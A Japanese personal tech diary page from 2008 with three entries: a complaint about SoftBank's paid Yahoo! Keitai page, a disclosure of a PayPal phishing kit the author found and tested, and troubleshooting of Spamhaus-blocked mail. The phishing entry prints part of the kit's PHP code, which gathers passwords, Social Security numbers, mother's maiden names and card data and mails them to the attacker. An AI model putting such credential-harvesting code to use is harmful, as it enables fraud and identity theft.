title
TOP / Wiki / Diary / Profile / BBS / Mail
メッセージを送る / タイトル一覧 / タイトル一覧(カテゴリ別) /
わたしの日記は日々の出来事の鬱憤晴らしの毒だし日記がメインです。 相当病んでいます。くだを巻いています。許容出来る方のみのアクセスをお願いします。 また、この日記へのリンクは原則自由にして頂いても結構ですが、 写真への直リンクを張るのはご遠慮下さい。内容に関しては、一切保証致しません。
カテゴリ一覧 Network, Internet, IPv6, DC, NTT, Comp, Linux, Debian, FreeBSD, Windows, Server, Security, IRC, 大学, Neta, spam, , 生活, 遊び, Drive, TV, 仕事,
過去日記:



2008年11月17日(月) [雨]

[Other] ソフトバンクモバイルがボタン1つでアクセスできる「Yahoo!ケータイ」のトップページを有料化、携帯電話を傾けると再課金も

「Yahoo!ケータイ」トップページについてを見る限りでは、2009年2月1日(日)以降有料化になるらしい。
すなわち、利用プラン変更等、webからたどり、暗証番号をいれ、確認後電話でプラン変更を行うという作業についてもお金がかかるわけですか。
また、利用料金明細を見るだけでもお金がかかるようになるわけですか。最悪ですね…。
後者については、ネットで見れるのであまり関係は無さそうですが、うっかりとボタンを押してしまうことを考えるとひどいなあと思います。
パケ定額等一切付けてないので、まず、webをみようとすることが有りませんが、うっかり作業中に押してしまった、なにかに当たってボタンおされてしまったということが数ヶ月に1,2回程度有る。これを防ぐ手だては内のだろうか?
今後発売される機種には、ブラウザを起動したあと、表示しますか?といった確認が出るようになるのだろうか。

パケット割引等を付けている前提で考えないで欲しい。

[ コメントを読む(0) | コメントする ]

[Internet] PayPal フィッシングサイトの元となるツール…

とんでもないもの…見つけてしまいました。
いいのかい、これ(汗)

 http://210.***.***.***/PayPal.tgz

そして、そのサーバにはフィッシングサイトが仕掛けられていました。 

$ lv carcabot.php
---
$hostname = gethostbyaddr($ip);
$message  = "-----------------+ PayPal USA Bank Spam Result +-----------------\n";
$message .= "Email address : $user\n";
$message .= "PayPal Password : $pass\n\n";
$message .= "Full Name : $fullname\n";
$message .= "Mother Maiden Name : $mmn\n";
$message .= "Date of Birth : $bday/$bmonth/$byear\n";
$message .= "Social Security No : $ssn1-$ssn2-$ssn3\n";
$message .= "Phone Number : $userphone";
$meesage  = "$message$defaultmsg$secmsg$cc1msg$cc2msg$cc3msg$cc4msg";
$measage  = $default + $sec + $cc1 + $cc2 + $cc3 + $cc4;
$rnessage  = "$meesage\n";
$rnessage .= "---------------------------------------------------------\n";
$rnessage .= "Client IP      : $ip\n";
$rnessage .= "HostName    : $hostname\n";
$rnessage .= "Script    : ".$_SERVER['SERVER_NAME'] . $_SERVER['SCRIPT_NAME']."\n";
$rnessage .= "-----------------+ Created in 2008 by CarcaBot+------------------\n";

$emailme="****@******"; // Write your mail here  ← gmailが埋まってた

明らかに…。フィッシングの様です。 検証環境で実験してみたところ、フォームに入力後、PayPalの本物サイトへ飛ばされ誘導されるようになっており、POSTと同時に、指定されたメールアドレスにクレジットカードの番号や、PayPalのアカウント情報等がメールされました。クレジットカード番号は、適当に入力すると拒否され、正しいパターンに基づいて入力するチェックまで入っています。

送信メール内容は上記の感じです。

[ コメントを読む(0) | コメントする ]

[Internet] value-domain のメールサーバがRBLに登録

8月頃からメールが届かなくて何故だと調べていたが、メールのログで、value-domain.com で検索していたので見つからず。
まあいいやとおもい、放置していたのだが、ドメインの有効期限の通知メールやら届かないので調査してみた。(1コExpiresれてしまったので…。まだ、猶予期間だったため間に合った。)

で、過去のメールからメールヘッダを調査したところ、メールサーバは、sakura1.digi-rock.com[202.222.31.77]。すなわち、digi-rock.com で検索してればよかったようだ。

Nov 9 06:01:58 ns0 postfix/smtpd[23994]: NOQUEUE: reject: RCPT from sakura1.digi-rock.com[202.222.31.77]: 554 5.7.1 Service unavailable; Client host [202.222.31.77] blocked using zen.spamhaus.org; http://www.spamhaus.org/SBL/sbl.lasso?query=SBL67399; from=<root@sakura1.digi-rock.com> to=<***@example.com> proto=SMTP helo=<sakura1.digi-rock.com>

情報からわかることは、zen.spamhaus.org に登録されているぞ、ということ。情報を見たければ URLを開けば詳細がわかる。
見てみたところ、次のように書いてある。 

page carefully.
It contains the
reason for the
listing and who
to contact about it. 	Ref: SBL67399

202.222.31.77/32 is listed on the Spamhaus Block List (SBL)

27-Aug-2008 03:37 GMT | SR10

landing site for cell phone spammer.

Japanese language spam to cell phones sourced in the philipines
(SBL 67396) landing sites:

ぉぃぉぃ・・・。ケイタイへのスパムって(-_-;;;)

そういうわけで、届かないという状況の人は、zen.spamhaus.org を外すか、ホワイトリストを登録してください…。

Naoko  『こんにちは 同様のトラブルで2008年11月に4つのドメインを失いました。 その後、バリュードメインに質問をしましたが YAHOOやHOTMAILのアドレスを使うようにとのことで アドバイスどおり変更しましたが全くメールが届きません。 途方にくれながら こちらのページにたどり着きましたが コンピューターに詳しくないので 書かれている意味がよくわかりません。 対処の方法を詳しく教えていただけないでしょうか? よろしくお願いします。 』
[ コメントを読む(1) | コメントする ]
Diary for 1 day(s)
Powered by hns HyperNikkiSystem Project



(c) Copyright 1998-2014 tomocha. All rights reserved.